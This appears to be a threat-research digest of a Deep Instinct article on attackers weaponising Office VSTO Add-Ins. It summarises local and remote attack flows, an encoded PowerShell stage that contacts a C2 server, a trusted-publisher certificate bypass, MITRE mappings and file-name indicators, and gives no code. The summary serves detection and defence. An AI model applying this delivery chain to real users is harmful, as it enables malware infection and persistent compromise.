Threat Research

No Macro? No Worries. VSTO Being Weaponized by Threat Actors | Deep Instinct

Securonix

VSTO Add-Ins can be weaponized to deliver and execute code via Office documents, offering persistence across Office sessions. The article details local and remote VSTO attack flows, including user prompts to enable Add-Ins, encoded PowerShell payloads, and a remote 3rd-stage download from a C2. hashtags: #Eventos_CDG_1Maio #DanielSchell #PowerShell #VSTO

Keypoints

  • VSTO Add-Ins can be delivered with Office documents (local VSTO) or fetched remotely (remote VSTO) to execute code.
  • VSTO is an uncommon but increasingly explored attack vector that can evade some detections.
  • VSTO-bearing files reveal indicators such as a custom.xml with _AssemblyLocation and _AssemblyName properties.
  • Local VSTO payloads store the DLL and dependencies alongside the document, often in containers like ISO files.
  • Attack flow includes a Word document prompting the user to enable the Add-In (e.g., Eventos_CDG_1Maio.docx).
  • The Add-In payload decodes and executes a PowerShell snippet to reach a C2 server for a second stage.
  • Remote VSTO can download a password-protected ZIP, extract it to the user’s AppDataLocal folder, and run a conhost.exe as a 3rd-stage payload (sample-dependent).
  • A proof-of-concept explores multiple attack scenarios using VSTO, highlighting potential real-world abuses.

MITRE Techniques

  • [T1204] User Execution – The Word document prompts the user to enable an Add-In, triggering execution. Quote: ‘Word document (“Eventos_CDG_1Maio.docx”) prompts the user to allow “Add-In” installation.’
  • [T1059.001] PowerShell – The Add-In payload executes an encoded and compressed PowerShell snippet to reach the next stage. Quote: ‘encoded and compressed PowerShell snippet:’
  • [T1027] Obfuscated/Compressed Files and Information – The payload uses encoding and compression to conceal the PowerShell code. Quote: ‘encoded and compressed PowerShell snippet’
  • [T1105] Ingress Tool Transfer – The attacker downloads a password-protected ZIP, extracts it in AppDataLocal, and executes a contained conhost.exe. Quote: ‘download a password protected .ZIP archive, extract it in the user’s %AppDataLocal folder, and execute a contained “conhost.exe” file.’
  • [T1218.005] Signed Binary Proxy Execution: Trusted Publisher – Bypassing trust-related security mechanisms using a trusted publisher certificate for remote VSTO. Quote: ‘bypassing trust-related security mechanisms using a trusted publisher certificate’

Indicators of Compromise

  • [File Name] VSTO-related payload and components – Eventos_CDG_1Maio.docx, Eventos_CDG_1Maio.dll

Read more: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors